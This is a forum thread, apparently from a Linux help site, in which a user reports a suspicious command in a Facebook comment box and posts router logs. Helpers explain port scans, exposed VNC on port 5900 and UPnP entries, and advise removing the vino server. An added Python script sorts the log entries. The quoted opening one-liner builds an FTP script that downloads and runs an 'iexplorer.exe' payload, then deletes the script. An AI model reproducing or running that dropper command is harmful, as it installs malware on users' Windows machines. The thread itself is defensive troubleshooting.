I was just browsing fb and had just finished posting a comment when all of a sudden in the usual comment entry box, I saw this appear…
del eq&echo open 0.0.0.0 14012 >> eq&echo user 30673 32497 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
I have my router log too if either MP or Mark wants to check it over?
That’s scary! Mark is coming back soon I think- hope he can sort it for you. Hackers are vile.
Bit of a sensationalist title, don’t you think

Can’t talk for how secure your Fekbook account is … but that’s targeted at Windows, hence the “del” commands, and mention of iexplorer.exe
Any attempt to install any software in Linux would meet with a major FAIL, due to permissions and the execute bit being disabled … nothing to worry about.
–
I know, I was laughing my ass off when I was reading it, thinking ‘This ain’t Window$ ya douche’
But in all seriousness, how did/can they get onto my PC if I’ve got router firewall on?
I’ve also noticed an unauthorised access to port 5900
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
And this;
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
And…
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
I have noticed that there are 3 rules set in the UPnP list
http://img197.imageshack.us/img197/1839/as17.png
[quote]
how did/can they get onto my PC if I've got router firewall on?
[/quote]
They didn’t … if anything they may have compromised fekbook.
[quote]
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[/quote]
Do you have VNC installed on the local PC with this IP address (192.168.1.2) … or a port for VNC forwarded through your router ? … port 5900 is usually used for VNC
and someone from an IP in Chile is attempting to connect.
If you’re not running VNC or another service on that port that requires an open port for incoming connections … disable/remove the port forward rule … or set gufw to refuse incoming connections
[quote]
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
[/quote]
Unlikely to be a problem … more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.
[quote]
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
[/quote]
Perfectly normal … an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust its setting to open a port for it … the router is just logging the event for reference.
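A triage script for the log entry types explained in the reply above, added here as an example and not posted by anyone in the thread. It separates connections that got to a LAN host from scan entries and UPnP events, so the port that needs attention (5900 here) stands out; the function name `triage` and the report keys are assumptions of this example.

```python
import re
from collections import defaultdict

# Entries copied from the router log posted in the thread.
SAMPLE_LOG = """\
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
[LAN access from remote] from 50.116.40.245:43314 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[WLAN access rejected: incorrect security] from MAC address 2c:41:38:c1:4b:9b, Wednesday, August 21,2013 00:55:50
"""

TAG = re.compile(r"^\[([^\]]+)\]\s*(.*)$")
FORWARDED = re.compile(r"from ([\d.]+):\d+ to ([\d.]+):(\d+),")
UPNP_SOURCE = re.compile(r"from source:? ([\d.]+)")

def triage(log_text):
    """Group router log entries by what they mean for exposure."""
    report = {"forwarded": defaultdict(set), "upnp": defaultdict(list),
              "scan_entries": 0, "wlan_rejects": 0, "unparsed": []}
    for line in filter(None, map(str.strip, log_text.splitlines())):
        tag_match = TAG.match(line)
        tag, rest = tag_match.groups() if tag_match else ("", line)
        fwd = FORWARDED.search(rest)
        src = UPNP_SOURCE.search(rest)
        if tag == "LAN access from remote" and fwd:
            # Inbound connection that got to a LAN host on this port.
            remote, host, port = fwd.groups()
            report["forwarded"][(host, int(port))].add(remote)
        elif tag.startswith("UPnP set event:") and src:
            # A LAN application asked the router to add/remove a NAT rule.
            report["upnp"][src.group(1)].append(tag.split(":", 1)[1].strip())
        elif tag.startswith("DoS Attack:"):
            report["scan_entries"] += 1   # scan noise; no LAN host involved
        elif tag.startswith("WLAN access rejected"):
            report["wlan_rejects"] += 1   # failed wireless association
        else:
            report["unparsed"].append(line)
    return report

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for (host, port), remotes in sorted(result["forwarded"].items()):
        print(f"{host}:{port} reachable from WAN, seen from {sorted(remotes)}")
    print("scan entries:", result["scan_entries"],
          "| WLAN rejects:", result["wlan_rejects"])
```

Any host and port listed under `forwarded` is where to check for a listening service and a port forward or UPnP rule.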
[quote author=Mark Greaves (PCNetSpec) link=topic=11060.msg86935#msg86935 date=1376954802]
Do you have VNC installed on the local PC with this IP address (192.168.1.2) .. or a port for VNC forwarded through your router ? .. port 5900 is *usually* used for VNC
[/quote]
Maybe but I don’t knowingly use it.
[quote]
and someone from an IP in Chile is attempting to connect.
[/quote]
As it’s not in my port forwarding range then they’re trying to hack me!
[quote]
If you're not running VNC or another service on that port that requires an open port for incoming connections .. disable/remove the port forward rule .. or set gufw to refuse incoming connections
[/quote]
I can’t remember installing VNC. What’s it used for anyway and what do I do to completely remove all trace of it? And what’s ‘gufw’?
[quote]
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
Unlikely to be a problem .. more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.
[/quote]
That’s OK then!
[quote]
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
Perfectly normal … an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust its setting to open a port for it … the router is just logging the event for reference.
[/quote]
Why would/does it do that?
A Windows using friend, who also uses f’book, now has a machine the screen of which goes white a few seconds after boot.
The hardware is fine as it boots off Linux disks and runs ok.
The last thing he was doing on it was using f’book.
Mark, I have got VNC installed…‘Remote Desktop Viewer’
It’s the server you want to remove, not so much the client
What’s the output from:
dpkg -l | grep -i vnc
pooky2483@pooky2483-ubuntu12:~$ dpkg -l | grep -i vnc
ii libgtk-vnc-1.0-0 0.5.0-1ubuntu1 VNC viewer widget for GTK+2 (runtime libraries)
ii libgtk-vnc-2.0-0 0.5.0-1ubuntu1 VNC viewer widget for GTK+3 (runtime libraries)
ii libgvnc-1.0-0 0.5.0-1ubuntu1 VNC gobject wrapper (runtime libraries)
ii libvncserver0 0.9.8.2-2ubuntu1 API to write one’s own vnc server
ii python-gtk-vnc 0.5.0-1ubuntu1 VNC viewer widget for GTK+2 (Python binding)
ii vino 3.4.2-0ubuntu1.2 VNC server for GNOME
pooky2483@pooky2483-ubuntu12:~$
I have just been looking through more of my router logs and found this entry…
[Internet connected] IP address: 82.24.4.95, Tuesday, August 20,2013 10:51:25
Brighton - http://open.mapquest.com/?q=50.8333,-0.1500
I’ve noticed further attempts…
[DoS Attack: TCP/UDP Chargen] from source: 173.242.115.176, port 33546, Tuesday, August 20,2013 20:12:29
Pennsylvania - http://open.mapquest.com/?q=41.4486,-75.7280
[DoS Attack: ACK Scan] from source: 50.98.118.30, port 57727, Wednesday, August 21,2013 00:38:12
British Columbia - http://open.mapquest.com/?q=49.2667,-122.7833
[DoS Attack: RST Scan] from source: 75.16.229.104, port 19215, Wednesday, August 21,2013 00:41:11
Indiana - http://open.mapquest.com/?q=38.0000,-87.5631
[DoS Attack: RST Scan] from source: 92.109.111.5, port 54188, Wednesday, August 21,2013 00:42:30
Netherlands
And someone seems VERY determined to get onto my network as they are trying every 20 - 40 seconds
[WLAN access rejected: incorrect security] from MAC address 2c:41:38:c1:4b:9b, Wednesday, August 21,2013 00:55:50
STOP PANICKING
And if the router logs are causing you to panic … STOP READING THEM
You WILL get your ports scanned regularly, unfortunately there are that many idiot script kiddies in the world automatically scanning random IPs for open ports … but that’s what your router’s firewall is for.
And if you think whoever is attempting to access your wireless is going to crack your password if he only tries every 20 seconds, it’ll take him forever … but if it really bothers you, enable MAC address filtering in your router, where the router only allows wireless adapters with MAC addresses you specify to connect.
(that isn’t 100% proof against wireless cracking because someone with the correct knowledge could spoof your MAC address, but it does add another layer of security … there is NO 100% safe wireless security except turning wireless OFF)
Trust me, even if the people who are scanning for open ports find one … Linux has your back.
The best you can do for whichever neighbour is attempting to connect to your router wirelessly, is keep an eye out for the MAC addresses of connected devices and if there’s one connected that shouldn’t be … change the wireless WPA2 key … but the worst he’s liable to do is piggy back your internet connection until you notice him and change the password, it’ll then take him ages again to crack the new one.
As I said … STOP PANICKING or switch to ethernet cabling and disable wireless, which is the only 100% sure fire way of protecting against wireless cracking.
If you’re still worried, please read up on network security.
I’m NOT panicking.
If I was I’d be begging and pleading for help on how to stop these people from doing stuff. I’m just commenting on who and what is happening.
I’m actually having fun mapping them on Google 
I need to disable VNC as someone managed to get on my PC through port 5900
[LAN access from remote] from 50.116.40.245:43314 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43232 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43218 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
OMG LOL… Now CAPITAL ONE are trying to hack/down me :o :o :o :o
[DoS Attack: ACK Scan] from source: 64.40.9.14, port 6005, Wednesday, August 21,2013 12:43:31
No they didn’t … they managed to get TO your PC on port 5900 … the only thing they would have been able to do was get asked for the VNC password (hopefully you set one), which they don’t have.
They do NOT have access to your PC or network.
I’ve already said … uninstall vnc:
sudo apt-get remove --purge vino
Just been checking it out and connected to myself and could not see anywhere anything about a password?
Whoever it is that’s hacking my PC through fb is managing to actually control my PC as I was in Dolphin and the file screen was going up and down while I was trying to scroll it up.
If you want to see if you have a problem re: remote access, try running this from a friend’s house (against your IP address);
http://www.tenable.com/products/nessus/select-your-operating-system
(Runs on Linux, you’ll need to download it …)